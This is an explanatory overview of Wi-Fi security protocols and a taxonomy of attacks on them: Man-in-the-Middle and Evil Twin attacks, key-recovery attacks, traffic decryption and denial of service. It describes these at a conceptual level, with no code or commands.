Over the last two decades, Wi-Fi has played an integral role in keeping us connected in our homes, businesses, and public places. Wireless networks are commonly available everywhere, and we rely on Wi-Fi to maintain productivity. Various security protocols have been developed to protect Wi-Fi networks, including WEP, WPA, WPA2, and WPA3. These protocols make wireless networking more secure by providing authentication mechanisms and ensuring the data’s confidentiality and integrity.
Wi-Fi is a wireless technology built upon the IEEE 802.11 set of standards that allows capable devices like laptops and mobile devices to create networks and exchange information without needing actual wires. Internet connectivity occurs by connecting to a wireless router that allows the device to interface with the internet. Wi-Fi also provides access to a local network (WLAN) that allows you to send documents to a wireless printer.
Unfortunately, an adversary can use several types of attacks to compromise a Wi-Fi network’s security. An adversary may attempt to breach a Wi-Fi network’s security objectives, such as breaking confidentiality by eavesdropping traffic from legitimate users. We focus on Man-in-the-Middle attacks, Key-recovery attacks, Traffic Decryption attacks, and Denial of Service attacks in the taxonomy.
A Man-in-the-Middle (MitM) attack is where the adversary secretly relays communication between two parties breaching the mutual authentication. In a wireless network, the adversary relays packets between the access point and a client, allowing him to eavesdrop on traffic, replay, modify, and block packets from reaching their destination. Eavesdropping and altering traffic allows the adversary to obtain credentials, display incorrect information, use services on behalf of the victim, and perform many more malicious actions.
The adversary may attack individual clients by launching a rogue access point that appears legitimate to the victim or device. We speak of an Evil Twin attack when the malicious network uses the same MAC, BSSID, and SSID as the target network. The adversary can provide internet access when expected from the target network, making it harder for a user to notice that it is connected to a malicious network. However, the adversary has placed himself in a Man-in-the-Middle position and can eavesdrop on traffic. According to Norton’s survey, 54% of consumers cannot distinguish between a secure and an insecure public network. An Evil Twin is interesting for both adversaries and security auditors as many well-known auditing tools adopt it.
Man-in-the-Middle attacks are versatile and powerful, as an adversary can target almost any network and security configuration. The adversary can also have different goals in mind, such as eavesdropping on traffic or collecting Wi-Fi credentials of Enterprise networks.
A Key-recovery attack is an attack where the adversary attempts to recover the pre-shared key used to associate with a network. Recovering this key provides the adversary with new capabilities, such as launching an Evil Twin attack or associating with the network as a client and performing other attacks, such as ARP spoofing.
An adversary may exploit potential weaknesses in the authentication protocol executed between a client and the access point. For example, the adversary could capture the 4-way handshake of a client associating with the network and perform an offline Dictionary attack. WPA3 offers greater protection against these offline brute-force attacks due to the new handshake that derives a common PMK.
Another technique the adversary may use is recovering the key by performing statistical analysis on encrypted traffic. Networks secured with WEP are the most susceptible, as they can be cracked within a couple of minutes using freely available tools. Starting from WPA, the pre-shared key is no longer used to encrypt traffic directly, making statistical analysis infeasible.
A Traffic Decryption attack is when the adversary attempts to crack the encryption of a packet exchanged on a network. Breaking the encryption usually means that the adversary learns the plaintext of a packet, which breaches data confidentiality. Along with other attacks, the adversary may recover encryption keys used for data integrity, allowing the adversary to spoof packets.
Most attacks propose a scheme to recover the plaintext of one packet, such as altering packets and having the access point forward them to the adversary. The proposed schemes are somewhat complicated. There is no tooling available; therefore, attempting to decrypt traffic from modern networks seems complicated for an adversary or a pentester compared to other attack types.
Denial of Service
A Denial of Service (DoS) attack is a type of attack that aims to affect the availability of system resources to legitimate users. An adversary may attempt to overload a system with many requests, so there are insufficient resources to handle the requests. Also, software vulnerabilities may lead to denial of service; for example, an adversary may include special characters in its request that the application cannot handle, causing the software to crash.
In a wireless network, an adversary can take different approaches, targeting multiple layers of the OSI model layer. As wireless communication happens over a shared medium where data is broadcasted via radio waves, an adversary can intentionally interfere with these radio signals. These attacks on the Physical layer are known as radio frequency jamming. Denial of Service attacks on the Data Link layer is perpetrated by spoofing packets to a client or access point. For example, an adversary can spoof de-authentication packets, causing legitimate clients to be de-associated from the network.
Launching a Denial-of-Service attack can be interesting for an adversary intending to disrupt Wi-Fi communication. Some attacks, such as the one targeting TKIP, can be achieved by transmitting a low number of packets.